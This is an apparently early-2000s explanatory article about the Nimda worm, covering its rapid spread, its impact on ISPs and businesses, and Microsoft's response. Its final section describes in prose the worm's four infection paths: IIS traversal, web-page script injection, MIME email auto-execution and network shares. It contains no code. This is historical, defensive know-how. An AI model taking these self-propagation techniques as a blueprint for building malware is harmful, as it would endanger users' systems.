Nimda - a multi-headed virus

Abstract

Once again many people have seen Internet bandwidth and performance slow and grind to a crawl. This time it was compliments of the most potent Internet virus yet as it flooded PCs and servers around the world in its attempts to infect and contaminate vulnerable systems.

At first thought to be ebbing and a relatively low-grade problem, the virus struck back as a vicious "High Risk", highly automated, multi-headed monster capable of creating havoc for home users, business users and for the very Internet infrastructure itself.

Known as the "Nimda" or "readme.exe" virus, this highly insidious worm spreads by sending infected e-mail messages, copying itself to computers within networks, and compromising Web servers that use Microsoft's Internet Information Server (IIS) software.

Yet one more time a worm has spread via systems running Microsoft software and literally crashed the Internet with data. Nimda, which is said to be "admin," the shortened form of "system administrator," spelled backwards has proven so malicious the FBI has been prompted to create a task force to investigate the attack.

What Has Been the Impact of the Virus

The Nimda worm hit so quickly, peaking within 6 hours, and caused so much havoc that accurate analysis of the worm has been difficult to assess. In general, it is fair to say everyone who does business on the Web was affected.

The highest concentrations of infected systems were in Canada, Denmark, Italy, Norway, the United Kingdom and the United States. The numbers of infections identified are considered the tip of the iceberg. There remain many others that have been infected who either don't yet know it or haven't reported it.

Increases in terms of alerts volume has been as high as 10,000 times that of normal. It is spreading five times faster than the Code Red virus, which hit in July and August. Thus far it doesn't seem to be using any psychological tricks because it's so automated.

Alarming infection rates are occurring throughout parts of Asia. South Korea said the numbers of infections are growing exponentially. Korea has experienced an 11-fold increase in infections.

How did the Virus Manage to Spread so Quickly?

The worm originally spread quickly by broadly scanning local networks and the Internet for Web servers running Microsoft's Internet Information Server software that were vulnerable to one of two well-known flaws. Therefore it did not have to wait for people to receive and open e-mail and then re-transmit and cross infect, instead by scanning it just started infecting straight away, automatically.

Who Does Nimda Infect?

Also known as "readme.exe" and "W32.Nimda," the worm is the first to use four different methods to infect PCs running Windows 95, 98, Me and 2000, but also servers running Windows 2000 and Windows NT.

How Does it Work?

The worm spreads by:

• E-mailing itself as an attachment
• Scanning for, and then infecting vulnerable Web servers running Microsoft's Internet Information Server software
• Copying itself over shared disk drives on networks
• Appending programming code to Web pages so that they will download the worm to a Web surfers' computer when they visit the page.
• By using FTP or IRC Internet Relay Chat type software.

Much of the worm's virulence is due to its unusually highly automated approach. A contaminated E-mail attachment will open automatically under Microsoft's Outlook e-mail program if the program's security settings are set to "low" and / or a security patch has not been installed. Even on those computers not using Outlook, the worm can still spread by starting and using its own e-mail engine. Receivers of the mass-mailing worm get an e-mail message with an attachment titled "readme.exe" usually disguised as an audio file.

The worm also generates a veritable flood of Internet traffic when it generates scans of the Internet seeking vulnerable servers to infect and spread. This type of automated scanning causes huge connectivity problems for business network systems on the Internet.

Is There A Link to the World Trade Centre Attack?

The FBI said the agency was "assessing" the incident, but so far it found no relationship between the online deluge and last week's terrorist attacks on the World Trade Center and the Pentagon.

The bug first appeared in the United States on last Tuesday and spread to Asia overnight. Thousands of European businesses also opened on Wednesday with infected computer systems. Some industry insiders remain open-minded on the matter.

Why Didn’t the ISP Community Contain the Outbreak?

Because of its tenacity the worm caused some Internet service providers to take drastic steps to block their own customers from spreading the worm and overloading networks with traffic. One ISP was said to have disconnected over twenty five percent of its customers' Web servers from the Internet in an attempt to stop the flood of data being produced by the worm.

A broadband (ADSL) ISP is said to have completely cut off many of its customers after it became apparent that their computers had been infected by the worm and were reducing bandwidth to standard old dial-up speeds.

Some frustrated and infuriated customers’ accused their ISPs of being ill prepared as the virus is hitting systems. They accused ISPs of using the worm as a convenient excuse to cover the fact that they were not up to date with all the protection necessary. Most ISPs agreed that it could be months before the virus is completely eradicated.

How has Nimda Affected Business?

Many of the bigger companies appear to be taking measures quickly, but traditionally the smaller SOHO computer users and small business are relatively slow to respond.

Many small businesses who have embraced the Internet get their network setup by outside IT firms, they don't have full-time technical IT people on staff to monitor and react to these types of events. This makes them the most susceptible during these attacks. They also become victims because they tend to centralize all functions under one server, making them even more vulnerable to attacks.

Nonetheless larger firms and organisations have also been severely hit. No one was spared. Parliament house was forced off-line along with large and small institutions from almost all business sectors. The mere presence of the worm has forced some companies to shut down parts of their networks to prevent infection or further exposure.

Where are the Future Threats of This Virus?

As business comes to grips with this virus home users are going to be the next primary mechanism for the e-mail spread of contamination.

Owners of home PCs often do not keep their anti-virus software current with the latest virus definitions. It's these users that have anti-virus experts worried. It's getting home users to protect their systems adequately and keep them up to date that can be a challenge.

How do we get Rid of Nimda From our Computers?

Anti Virus software companies and other security firms are continuing to develop software tools to help clean computer systems. However, even if people and companies do completely eliminate the worm from their networks and various computers Nimda will remain out there for a long time to come. The previous virus, Code Red and its variants still account for some 30,000 infections worldwide.

As one organisation’s Web servers become infected with the worm, they risk contaminating any user viewing a Web page hosted on that server. Code Red is still going strong because, almost unbelievably, there are many un-patched systems that still remain on the Web. By that measure alone, Nimda should be around for a quite a while.

Nimda’s extensive replacement of key files and programs on infected computers and its use of Windows file sharing to spread across local area networks have made it extraordinarily difficult to clean out. Immediate re-infection rates have also been remarkably high.

Microsoft has also posted an extensive list of patches and advisories to combat the worm. Analyses of the Nimda worm can be found at CERT

How are we Going to Better Manage Future Outbreaks?

Software producers will have to become far more pro-active about contacting customers when major security threats like Nimda arise. Rather than post an advisory on a hard-to-find Web site or wait for the news media, software companies should send e-mail to customers telling them to update their software immediately.

How is Microsoft Reacting to This Virus?

Microsoft denied claims last Wednesday that the main Web site of its "Front Page" software was infected with the Nimda virus. Concerns were raised when anti-virus software alarms had been set off when viewing the site. Initially security experts had believed Microsoft might have failed to patch at least one major server. However, a Microsoft spokesman later said that wasn't the case.

Some feel that should be of small comfort to computer users. One Anti Virus company stated "Not only do they have an application-development history of having massive security flaws," he said, "they have an operations history of having flaws." In August of this year Microsoft admitted Code Red had infected its Hotmail e-mail service.

To be fair however, Microsoft isn't alone. This time around, many Web servers have been infected with the Nimda worm.

For the Inquiring Mind

1) First, if the server had already been compromised by the Code Red II worm, then Nimda used that backdoor to copy itself to the server as a file named "admin.dll." For all other IIS servers, the program attempted to use the "Web server folder traversal" vulnerability discovered in October 2000 to copy the file "admin.dll" to the server.

Once the file is copied to the computer, the worm executes it and infects the new victim. On such servers, the worm creates a "guest" account with administrative privileges, copies itself to any network drives, makes the C: drive publicly accessible, and appends a script to HTM, HTML and ASP files.

The files will attempt to upload a copy of the worm to the computer of anyone who views a Web page hosted by the infected computer using a browser with JavaScript enabled. The worm also deletes the keys in the registry that set the security preferences for the computer and also causes itself to be run at start-up.

2) The ability to infect others through viewing a Web page is the Nimda worm's second path of infection.

The snippet of JavaScript added to each Web file on an infected server will cause the worm, renamed "readme.eml," to upload from the server to that surfer's computer. The worm will run automatically on PCs using un-patched versions of Microsoft's Internet Explorer 5.5 SP1 or earlier. On any browser with JavaScript enabled, the worm's script will cause the browser to try to upload the code but will first ask the PC user's permission.

3) PCs can also be infected through the worm's third mode of transmission: e-mail.

On infected computers, the Nimda worm runs its own mail service and sends e-mail to addresses in Windows address book as well as to those culled from the machine's browser cache, which stores elements of recently viewed Web pages.

The e-mail appears to have an attached WAV file, but in reality it uses an old MIME (multipurpose Internet mail extensions) vulnerability to automatically run the worm once the e-mail is viewed in the mail client's preview plane.

Even on computers that are not vulnerable to the security flaw, the attachment causes the Outlook and Outlook Express e-mail programs to open a dialog box asking the user for permission to open the file.

If the worm infects a PC through either the Web browser or e-mail, Nimda acts much like it does on servers. In addition, the worm adds a "load.exe" file to the Windows System directory, appends itself to many .exe, .eml and Word document files, and replaces common applications such as WordPad, WinZip32 and HyperTerminal with a copy that executes the worm.

In addition, the worm places copies of "Riched20.dll"--the program that is the workhorse text editor for Word, WordPad and other editing programs--in multiple places on every accessible hard drive. Whenever a program that uses Riched20.dll opens, that also executes the worm.

4) This ability to spread copies of itself throughout corporate networks by using shared drives is the fourth way the worm infects.

Using the network-sharing mechanism, the Nimda worm spreads fast and makes extermination very difficult. As fast as you can clean one area of the network, it almost seems to be coming back behind you and re-infecting the cleaned systems

Arthur Hissey
Computer Research & Technology
www.crt.net.au